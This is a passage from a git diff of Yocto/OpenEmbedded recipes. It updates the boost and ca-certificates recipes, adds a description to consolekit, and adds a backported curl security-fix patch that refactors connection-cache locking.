-+ "sub %0 ,%0, #1 \n\t"
-+ "strex %2, %0, %1 \n\t"
-+ "cmp %2, #0 \n\t"
-+ "bne 1b \n\t"
-+ : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+ );
-+ return value_;
-+#else
- return __sync_add_and_fetch( &value_, -1 );
-+#endif
- }
-
- operator long() const
- {
-+#if __ARM_ARCH_7A__
-+ return value_;
-+#else
- return __sync_fetch_and_add( &value_, 0 );
-+#endif
- }
-
- private:
diff --git a/meta/recipes-support/boost/boost_1.72.0.bb b/meta/recipes-support/boost/boost_1.72.0.bb
index 51c84bc935..b3ec11933c 100644
--- a/meta/recipes-support/boost/boost_1.72.0.bb
+++ b/meta/recipes-support/boost/boost_1.72.0.bb
@@ -1,7 +1,7 @@
require boost-${PV}.inc
require boost.inc
-SRC_URI += "file://arm-intrinsics.patch \
+SRC_URI += " \
file://boost-CVE-2012-2677.patch \
file://boost-math-disable-pch-for-gcc.patch \
file://0001-Apply-boost-1.62.0-no-forced-flags.patch.patch \
@@ -9,4 +9,6 @@ SRC_URI += "file://arm-intrinsics.patch \
file://0001-dont-setup-compiler-flags-m32-m64.patch \
file://0001-revert-cease-dependence-on-range.patch \
file://0001-added-typedef-executor_type.patch \
+ file://0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch \
+ file://0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch \
"
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
new file mode 100644
index 0000000000..5c4a32f526
--- /dev/null
+++ b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
@@ -0,0 +1,80 @@
+From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Mon, 18 Oct 2021 12:05:49 +0200
+Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired
+ certificates."
+
+This avoids a dependency on python3-cryptography, and only checks
+for expired certs (which is upstream concern, but not ours).
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ debian/changelog | 1 -
+ debian/control | 2 +-
+ mozilla/certdata2pem.py | 11 -----------
+ 3 files changed, 1 insertion(+), 13 deletions(-)
+
+diff --git a/debian/changelog b/debian/changelog
+index 531e4d0..4006509 100644
+--- a/debian/changelog
++++ b/debian/changelog
+@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low
+ - "Trustis FPS Root CA"
+ - "Staat der Nederlanden Root CA - G3"
+ * Blacklist expired root certificate "DST Root CA X3" (closes: #995432)
+- * mozilla/certdata2pem.py: print a warning for expired certificates.
+
+ -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200
+
+diff --git a/debian/control b/debian/control
+index 4434b7a..5c6ba24 100644
+--- a/debian/control
++++ b/debian/control
+@@ -3,7 +3,7 @@ Section: misc
+ Priority: optional
+ Maintainer: Julien Cristau <jcristau@debian.org>
+ Build-Depends: debhelper-compat (= 13), po-debconf
+-Build-Depends-Indep: python3, openssl, python3-cryptography
++Build-Depends-Indep: python3, openssl
+ Standards-Version: 4.5.0.2
+ Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git
+ Vcs-Browser: https://salsa.debian.org/debian/ca-certificates
+diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
+index ede23d4..7d796f1 100644
+--- a/mozilla/certdata2pem.py
++++ b/mozilla/certdata2pem.py
+@@ -21,16 +21,12 @@
+ # USA.
+
+ import base64
+-import datetime
+ import os.path
+ import re
+ import sys
+ import textwrap
+ import io
+
+-from cryptography import x509
+-
+-
+ objects = []
+
+ # Dirty file parser.
+@@ -121,13 +117,6 @@ for obj in objects:
+ if obj['CKA_CLASS'] == 'CKO_CERTIFICATE':
+ if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]:
+ continue
+-
+- cert = x509.load_der_x509_certificate(obj['CKA_VALUE'])
+- if cert.not_valid_after < datetime.datetime.now():
+- print('!'*74)
+- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL'])
+- print('!'*74)
+-
+ bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\
+ .replace(' ', '_')\
+ .replace('(', '=')\
+--
+2.20.1
+
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
deleted file mode 100644
index aa2c85ff43..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/0001-certdata2pem.py-use-python3.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From b6d18ca77f131cdcaa10d0eaa9d303399767edf6 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:18:14 +0200
-Subject: [PATCH] certdata2pem.py: use python3
-
-Comments in that file imply it is already py3 compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- mozilla/Makefile | 2 +-
- mozilla/certdata2pem.py | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/mozilla/Makefile b/mozilla/Makefile
-index 6f46118..f98877c 100644
---- a/mozilla/Makefile
-+++ b/mozilla/Makefile
-@@ -3,7 +3,7 @@
- #
-
- all:
-- python certdata2pem.py
-+ python3 certdata2pem.py
-
- clean:
- -rm -f *.crt
-diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py
-index 0b02b2a..7d796f1 100644
---- a/mozilla/certdata2pem.py
-+++ b/mozilla/certdata2pem.py
-@@ -1,4 +1,4 @@
--#!/usr/bin/python
-+#!/usr/bin/python3
- # vim:set et sw=4:
- #
- # certdata2pem.py - splits certdata.txt into multiple files
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
deleted file mode 100644
index a113fa8b15..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch
+++ /dev/null
@@ -1,20 +0,0 @@
-Upstream-Status: Pending
-
-Let us alter the install destination of the script via SBINDIR
-
---- ca-certificates-20130119.orig/sbin/Makefile
-+++ ca-certificates-20130119/sbin/Makefile
-@@ -3,9 +3,12 @@
- #
- #
-
-+SBINDIR = /usr/sbin
-+
- all:
-
- clean:
-
- install:
-- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/
-+ install -d $(DESTDIR)$(SBINDIR)
-+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
deleted file mode 100644
index 6e2171f758..0000000000
--- a/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 30378026d136efa779732e3f6664e2ecf461e458 Mon Sep 17 00:00:00 2001
-From: Patrick Ohly <patrick.ohly@intel.com>
-Date: Thu, 17 Mar 2016 12:38:09 +0100
-Subject: [PATCH] update-ca-certificates: support Toybox
-
-"mktemp -t" is deprecated and does not work when using Toybox. Replace
-with something that works also with Toybox.
-
-Upstream-Status: Pending
-
-Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
----
- sbin/update-ca-certificates | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates
-index 79c41bb..ae9e3f1 100755
---- a/sbin/update-ca-certificates
-+++ b/sbin/update-ca-certificates
-@@ -113,9 +113,9 @@ trap cleanup 0
-
- # Helper files. (Some of them are not simple arrays because we spawn
- # subshells later on.)
--TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")"
--ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
--REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")"
-+TEMPBUNDLE="$(mktemp -p${TMPDIR:-/tmp} "${CERTBUNDLE}.tmp.XXXXXX")"
-+ADDED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-+REMOVED="$(mktemp -p${TMPDIR:-/tmp} "ca-certificates.tmp.XXXXXX")"
-
- # Adds a certificate to the list of trusted ones. This includes a symlink
- # in /etc/ssl/certs to the certificate file and its inclusion into the
---
-2.1.4
diff --git a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
index ce3cb217a1..a54d6b458a 100644
--- a/meta/recipes-support/ca-certificates/ca-certificates_20190110.bb
+++ b/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb
@@ -5,7 +5,7 @@ This derived from Debian's CA Certificates."
HOMEPAGE = "http://packages.debian.org/sid/ca-certificates"
SECTION = "misc"
LICENSE = "GPL-2.0+ & MPL-2.0"
-LIC_FILES_CHKSUM = "file://debian/copyright;md5=aeb420429b1659507e0a5a1b123e8308"
+LIC_FILES_CHKSUM = "file://debian/copyright;md5=ae5b36b514e3f12ce1aa8e2ee67f3d7e"
# This is needed to ensure we can run the postinst at image creation time
DEPENDS = ""
@@ -14,17 +14,16 @@ DEPENDS_class-nativesdk = "openssl-native"
# Need rehash from openssl and run-parts from debianutils
PACKAGE_WRITE_DEPS += "openssl-native debianutils-native"
-SRCREV = "c28799b138b044c963d24c4a69659b6e5486e3be"
+SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8"
-SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \
file://0002-update-ca-certificates-use-SYSROOT.patch \
file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \
- file://update-ca-certificates-support-Toybox.patch \
file://default-sysroot.patch \
- file://sbindir.patch \
file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \
- file://0001-certdata2pem.py-use-python3.patch \
+ file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \
"
+UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)"
S = "${WORKDIR}/git"
@@ -83,8 +82,8 @@ do_install_append_class-native () {
SYSROOT="${D}${base_prefix}" ${D}${sbindir}/update-ca-certificates
}
-RDEPENDS_${PN}_class-target = "openssl-bin"
-RDEPENDS_${PN}_class-native = "openssl-native"
-RDEPENDS_${PN}_class-nativesdk = "nativesdk-openssl-bin"
+RDEPENDS_${PN}_append_class-target = " openssl-bin openssl"
+RDEPENDS_${PN}_append_class-native = " openssl-native"
+RDEPENDS_${PN}_append_class-nativesdk = " nativesdk-openssl-bin nativesdk-openssl"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/consolekit/consolekit_0.4.6.bb b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
index 89f2d77b66..22e755747b 100644
--- a/meta/recipes-support/consolekit/consolekit_0.4.6.bb
+++ b/meta/recipes-support/consolekit/consolekit_0.4.6.bb
@@ -1,4 +1,6 @@
SUMMARY = "Framework for defining and tracking users, login sessions, and seats"
+DESCRIPTION = "It provides a mechanism for software to react to changes \
+of any of these items or of any of the metadata associated with them."
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/ConsoleKit"
BUGTRACKER = "https://bugs.freedesktop.org/buglist.cgi?query_format=specific&product=ConsoleKit"
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8231.patch b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
new file mode 100644
index 0000000000..51f40047f1
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8231.patch
@@ -0,0 +1,1092 @@
+From c3359693e17fccdf2a04f0b908bc8f51cdc38133 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 27 Apr 2020 00:33:21 +0200
+Subject: [PATCH 1/3] conncache: various concept cleanups
+
+More connection cache accesses are protected by locks.
+
+CONNCACHE_* is a beter prefix for the connection cache lock macros.
+
+Curl_attach_connnection: now called as soon as there's a connection
+struct available and before the connection is added to the connection
+cache.
+
+Curl_disconnect: now assumes that the connection is already removed from
+the connection cache.
+
+Ref: #4915
+Closes #5009
+
+Upstream-commit: c06902713998d68202c5a764de910ba8d0e8f54d
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+
+Upstream-Status: Backport [import from fedora https://koji.fedoraproject.org/koji/fileinfo?rpmID=24270817&filename=0004-curl-7.69.1-CVE-2020-8231.patch ]
+CVE: CVE-2020-8286
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/conncache.c | 87 ++++++++++++++++++++-----------------------
+ lib/conncache.h | 9 ++---
+ lib/hostip.c | 12 +++---
+ lib/http_negotiate.h | 6 ++-
+ lib/http_ntlm.h | 6 ++-
+ lib/multi.c | 56 ++++++++++++++--------------
+ lib/multiif.h | 1 +
+ lib/url.c | 69 ++++++++++++++++++----------------
+ tests/data/test1554 | 14 +++++++
+ tests/unit/unit1620.c | 6 +--
+ 10 files changed, 139 insertions(+), 127 deletions(-)
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index cbd3bb1..95fcea6 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -49,53 +49,51 @@ static void conn_llist_dtor(void *user, void *element)
+ conn->bundle = NULL;
+ }
+
+-static CURLcode bundle_create(struct Curl_easy *data,
+- struct connectbundle **cb_ptr)
++static CURLcode bundle_create(struct connectbundle **bundlep)
+ {
+- (void)data;
+- DEBUGASSERT(*cb_ptr == NULL);
+- *cb_ptr = malloc(sizeof(struct connectbundle));
+- if(!*cb_ptr)
++ DEBUGASSERT(*bundlep == NULL);
++ *bundlep = malloc(sizeof(struct connectbundle));
++ if(!*bundlep)
+ return CURLE_OUT_OF_MEMORY;
+
+- (*cb_ptr)->num_connections = 0;
+- (*cb_ptr)->multiuse = BUNDLE_UNKNOWN;
++ (*bundlep)->num_connections = 0;
++ (*bundlep)->multiuse = BUNDLE_UNKNOWN;
+
+- Curl_llist_init(&(*cb_ptr)->conn_list, (curl_llist_dtor) conn_llist_dtor);
++ Curl_llist_init(&(*bundlep)->conn_list, (curl_llist_dtor) conn_llist_dtor);
+ return CURLE_OK;
+ }
+
+-static void bundle_destroy(struct connectbundle *cb_ptr)
++static void bundle_destroy(struct connectbundle *bundle)
+ {
+- if(!cb_ptr)
++ if(!bundle)
+ return;
+
+- Curl_llist_destroy(&cb_ptr->conn_list, NULL);
++ Curl_llist_destroy(&bundle->conn_list, NULL);
+
+- free(cb_ptr);
++ free(bundle);
+ }
+
+ /* Add a connection to a bundle */
+-static void bundle_add_conn(struct connectbundle *cb_ptr,
++static void bundle_add_conn(struct connectbundle *bundle,
+ struct connectdata *conn)
+ {
+- Curl_llist_insert_next(&cb_ptr->conn_list, cb_ptr->conn_list.tail, conn,
++ Curl_llist_insert_next(&bundle->conn_list, bundle->conn_list.tail, conn,
+ &conn->bundle_node);
+- conn->bundle = cb_ptr;
+- cb_ptr->num_connections++;
++ conn->bundle = bundle;
++ bundle->num_connections++;
+ }
+
+ /* Remove a connection from a bundle */
+-static int bundle_remove_conn(struct connectbundle *cb_ptr,
++static int bundle_remove_conn(struct connectbundle *bundle,
+ struct connectdata *conn)
+ {
+ struct curl_llist_element *curr;
+
+- curr = cb_ptr->conn_list.head;
++ curr = bundle->conn_list.head;
+ while(curr) {
+ if(curr->ptr == conn) {
+- Curl_llist_remove(&cb_ptr->conn_list, curr, NULL);
+- cb_ptr->num_connections--;
++ Curl_llist_remove(&bundle->conn_list, curr, NULL);
++ bundle->num_connections--;
+ conn->bundle = NULL;
+ return 1; /* we removed a handle */
+ }
+@@ -162,20 +160,15 @@ static void hashkey(struct connectdata *conn, char *buf,
+ msnprintf(buf, len, "%ld%s", port, hostname);
+ }
+
+-void Curl_conncache_unlock(struct Curl_easy *data)
+-{
+- CONN_UNLOCK(data);
+-}
+-
+ /* Returns number of connections currently held in the connection cache.
+ Locks/unlocks the cache itself!
+ */
+ size_t Curl_conncache_size(struct Curl_easy *data)
+ {
+ size_t num;
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ num = data->state.conn_cache->num_conn;
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return num;
+ }
+
+@@ -188,7 +181,7 @@ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+ const char **hostp)
+ {
+ struct connectbundle *bundle = NULL;
+- CONN_LOCK(conn->data);
++ CONNCACHE_LOCK(conn->data);
+ if(connc) {
+ char key[HASHKEY_SIZE];
+ hashkey(conn, key, sizeof(key), hostp);
+@@ -235,8 +228,7 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+- struct connectbundle *bundle;
+- struct connectbundle *new_bundle = NULL;
++ struct connectbundle *bundle = NULL;
+ struct Curl_easy *data = conn->data;
+
+ /* *find_bundle() locks the connection cache */
+@@ -245,20 +237,19 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ int rc;
+ char key[HASHKEY_SIZE];
+
+- result = bundle_create(data, &new_bundle);
++ result = bundle_create(&bundle);
+ if(result) {
+ goto unlock;
+ }
+
+ hashkey(conn, key, sizeof(key), NULL);
+- rc = conncache_add_bundle(data->state.conn_cache, key, new_bundle);
++ rc = conncache_add_bundle(data->state.conn_cache, key, bundle);
+
+ if(!rc) {
+- bundle_destroy(new_bundle);
++ bundle_destroy(bundle);
+ result = CURLE_OUT_OF_MEMORY;
+ goto unlock;
+ }
+- bundle = new_bundle;
+ }
+
+ bundle_add_conn(bundle, conn);
+@@ -270,15 +261,17 @@ CURLcode Curl_conncache_add_conn(struct conncache *connc,
+ conn->connection_id, connc->num_conn));
+
+ unlock:
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+
+ return result;
+ }
+
+ /*
+- * Removes the connectdata object from the connection cache *and* clears the
+- * ->data pointer association. Pass TRUE/FALSE in the 'lock' argument
+- * depending on if the parent function already holds the lock or not.
++ * Removes the connectdata object from the connection cache, but does *not*
++ * clear the conn->data association. The transfer still owns this connection.
++ *
++ * Pass TRUE/FALSE in the 'lock' argument depending on if the parent function
++ * already holds the lock or not.
+ */
+ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ struct connectdata *conn, bool lock)
+@@ -290,7 +283,7 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ due to a failed connection attempt, before being added to a bundle */
+ if(bundle) {
+ if(lock) {
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ }
+ bundle_remove_conn(bundle, conn);
+ if(bundle->num_connections == 0)
+@@ -301,9 +294,8 @@ void Curl_conncache_remove_conn(struct Curl_easy *data,
+ DEBUGF(infof(data, "The cache now contains %zu members\n",
+ connc->num_conn));
+ }
+- conn->data = NULL; /* clear the association */
+ if(lock) {
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ }
+ }
+ }
+@@ -332,7 +324,7 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+ if(!connc)
+ return FALSE;
+
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ Curl_hash_start_iterate(&connc->hash, &iter);
+
+ he = Curl_hash_next_element(&iter);
+@@ -350,12 +342,12 @@ bool Curl_conncache_foreach(struct Curl_easy *data,
+ curr = curr->next;
+
+ if(1 == func(conn, param)) {
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return TRUE;
+ }
+ }
+ }
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ return FALSE;
+ }
+
+@@ -494,7 +486,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+
+ now = Curl_now();
+
+- CONN_LOCK(data);
++ CONNCACHE_LOCK(data);
+ Curl_hash_start_iterate(&connc->hash, &iter);
+
+ he = Curl_hash_next_element(&iter);
+@@ -531,7 +523,7 @@ Curl_conncache_extract_oldest(struct Curl_easy *data)
+ connc->num_conn));
+ conn_candidate->data = data; /* associate! */
+ }
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+
+ return conn_candidate;
+ }
+@@ -548,6 +540,7 @@ void Curl_conncache_close_all_connections(struct conncache *connc)
+ sigpipe_ignore(conn->data, &pipe_st);
+ /* This will remove the connection from the cache */
+ connclose(conn, "kill all");
++ Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ (void)Curl_disconnect(connc->closure_handle, conn, FALSE);
+ sigpipe_restore(&pipe_st);
+
+diff --git a/lib/conncache.h b/lib/conncache.h
+index e3e4c9c..3dda21c 100644
+--- a/lib/conncache.h
++++ b/lib/conncache.h
+@@ -45,21 +45,21 @@ struct conncache {
+ #ifdef CURLDEBUG
+ /* the debug versions of these macros make extra certain that the lock is
+ never doubly locked or unlocked */
+-#define CONN_LOCK(x) if((x)->share) { \
++#define CONNCACHE_LOCK(x) if((x)->share) { \
+ Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE); \
+ DEBUGASSERT(!(x)->state.conncache_lock); \
+ (x)->state.conncache_lock = TRUE; \
+ }
+
+-#define CONN_UNLOCK(x) if((x)->share) { \
++#define CONNCACHE_UNLOCK(x) if((x)->share) { \
+ DEBUGASSERT((x)->state.conncache_lock); \
+ (x)->state.conncache_lock = FALSE; \
+ Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT); \
+ }
+ #else
+-#define CONN_LOCK(x) if((x)->share) \
++#define CONNCACHE_LOCK(x) if((x)->share) \
+ Curl_share_lock((x), CURL_LOCK_DATA_CONNECT, CURL_LOCK_ACCESS_SINGLE)
+-#define CONN_UNLOCK(x) if((x)->share) \
++#define CONNCACHE_UNLOCK(x) if((x)->share) \
+ Curl_share_unlock((x), CURL_LOCK_DATA_CONNECT)
+ #endif
+
+@@ -77,7 +77,6 @@ void Curl_conncache_destroy(struct conncache *connc);
+ struct connectbundle *Curl_conncache_find_bundle(struct connectdata *conn,
+ struct conncache *connc,
+ const char **hostp);
+-void Curl_conncache_unlock(struct Curl_easy *data);
+ /* returns number of connections currently held in the connection cache */
+ size_t Curl_conncache_size(struct Curl_easy *data);
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index c0feb79..f5bb634 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -1085,10 +1085,12 @@ CURLcode Curl_once_resolved(struct connectdata *conn,
+
+ result = Curl_setup_conn(conn, protocol_done);
+
+- if(result)
+- /* We're not allowed to return failure with memory left allocated
+- in the connectdata struct, free those here */
+- Curl_disconnect(conn->data, conn, TRUE); /* close the connection */
+-
++ if(result) {
++ struct Curl_easy *data = conn->data;
++ DEBUGASSERT(data);
++ Curl_detach_connnection(data);
++ Curl_conncache_remove_conn(data, conn, TRUE);
++ Curl_disconnect(data, conn, TRUE);
++ }
+ return result;
+ }
+diff --git a/lib/http_negotiate.h b/lib/http_negotiate.h
+index 4f0ac16..a737f6f 100644
+--- a/lib/http_negotiate.h
++++ b/lib/http_negotiate.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -33,6 +33,8 @@ CURLcode Curl_output_negotiate(struct connectdata *conn, bool proxy);
+
+ void Curl_http_auth_cleanup_negotiate(struct connectdata *conn);
+
+-#endif /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#else /* !CURL_DISABLE_HTTP && USE_SPNEGO */
++#define Curl_http_auth_cleanup_negotiate(x)
++#endif
+
+ #endif /* HEADER_CURL_HTTP_NEGOTIATE_H */
+diff --git a/lib/http_ntlm.h b/lib/http_ntlm.h
+index 003714d..3ebdf97 100644
+--- a/lib/http_ntlm.h
++++ b/lib/http_ntlm.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -35,6 +35,8 @@ CURLcode Curl_output_ntlm(struct connectdata *conn, bool proxy);
+
+ void Curl_http_auth_cleanup_ntlm(struct connectdata *conn);
+
+-#endif /* !CURL_DISABLE_HTTP && USE_NTLM */
++#else /* !CURL_DISABLE_HTTP && USE_NTLM */
++#define Curl_http_auth_cleanup_ntlm(x)
++#endif
+
+ #endif /* HEADER_CURL_HTTP_NTLM_H */
+diff --git a/lib/multi.c b/lib/multi.c
+index e10e752..273653d 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -79,7 +79,6 @@ static CURLMcode add_next_timeout(struct curltime now,
+ static CURLMcode multi_timeout(struct Curl_multi *multi,
+ long *timeout_ms);
+ static void process_pending_handles(struct Curl_multi *multi);
+-static void detach_connnection(struct Curl_easy *data);
+
+ #ifdef DEBUGBUILD
+ static const char * const statename[]={
+@@ -112,7 +111,7 @@ static void Curl_init_completed(struct Curl_easy *data)
+
+ /* Important: reset the conn pointer so that we don't point to memory
+ that could be freed anytime */
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+ Curl_expire_clear(data); /* stop all timers */
+ }
+
+@@ -506,6 +505,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ easy handle is added */
+ memset(&multi->timer_lastcall, 0, sizeof(multi->timer_lastcall));
+
++ CONNCACHE_LOCK(data);
+ /* The closure handle only ever has default timeouts set. To improve the
+ state somewhat we clone the timeouts from each added handle so that the
+ closure handle always has the same timeouts as the most recently added
+@@ -515,6 +515,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ data->set.server_response_timeout;
+ data->state.conn_cache->closure_handle->set.no_signal =
+ data->set.no_signal;
++ CONNCACHE_UNLOCK(data);
+
+ Curl_update_timer(multi);
+ return CURLM_OK;
+@@ -589,14 +590,14 @@ static CURLcode multi_done(struct Curl_easy *data,
+
+ process_pending_handles(data->multi); /* connection / multiplex */
+
+- CONN_LOCK(data);
+- detach_connnection(data);
++ CONNCACHE_LOCK(data);
++ Curl_detach_connnection(data);
+ if(CONN_INUSE(conn)) {
+ /* Stop if still used. */
+ /* conn->data must not remain pointing to this transfer since it is going
+ away! Find another to own it! */
+ conn->data = conn->easyq.head->ptr;
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ DEBUGF(infof(data, "Connection still in use %zu, "
+ "no more multi_done now!\n",
+ conn->easyq.size));
+@@ -647,7 +648,8 @@ static CURLcode multi_done(struct Curl_easy *data,
+ || (premature && !(conn->handler->flags & PROTOPT_STREAM))) {
+ CURLcode res2;
+ connclose(conn, "disconnecting");
+- CONN_UNLOCK(data);
++ Curl_conncache_remove_conn(data, conn, FALSE);
++ CONNCACHE_UNLOCK(data);
+ res2 = Curl_disconnect(data, conn, premature);
+
+ /* If we had an error already, make sure we return that one. But
+@@ -666,7 +668,7 @@ static CURLcode multi_done(struct Curl_easy *data,
+ conn->bits.conn_to_host ? conn->conn_to_host.dispname :
+ conn->host.dispname);
+ /* the connection is no longer in use by this transfer */
+- CONN_UNLOCK(data);
++ CONNCACHE_UNLOCK(data);
+ if(Curl_conncache_return_conn(data, conn)) {
+ /* remember the most recently used connection */
+ data->state.lastconnect = conn;
+@@ -774,8 +776,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ vanish with this handle */
+
+ /* Remove the association between the connection and the handle */
+- if(data->conn)
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+
+ #ifdef USE_LIBPSL
+ /* Remove the PSL association. */
+@@ -824,9 +825,13 @@ bool Curl_multiplex_wanted(const struct Curl_multi *multi)
+ return (multi && (multi->multiplexing));
+ }
+
+-/* This is the only function that should clear data->conn. This will
+- occasionally be called with the pointer already cleared. */
+-static void detach_connnection(struct Curl_easy *data)
++/*
++ * Curl_detach_connnection() removes the given transfer from the connection.
++ *
++ * This is the only function that should clear data->conn. This will
++ * occasionally be called with the data->conn pointer already cleared.
++ */
++void Curl_detach_connnection(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ if(conn)
+@@ -834,7 +839,11 @@ static void detach_connnection(struct Curl_easy *data)
+ data->conn = NULL;
+ }
+
+-/* This is the only function that should assign data->conn */
++/*
++ * Curl_attach_connnection() attaches this transfer to this connection.
++ *
++ * This is the only function that should assign data->conn
++ */
+ void Curl_attach_connnection(struct Curl_easy *data,
+ struct connectdata *conn)
+ {
+@@ -1536,19 +1545,6 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ bool stream_error = FALSE;
+ rc = CURLM_OK;
+
+- DEBUGASSERT((data->mstate <= CURLM_STATE_CONNECT) ||
+- (data->mstate >= CURLM_STATE_DONE) ||
+- data->conn);
+- if(!data->conn &&
+- data->mstate > CURLM_STATE_CONNECT &&
+- data->mstate < CURLM_STATE_DONE) {
+- /* In all these states, the code will blindly access 'data->conn'
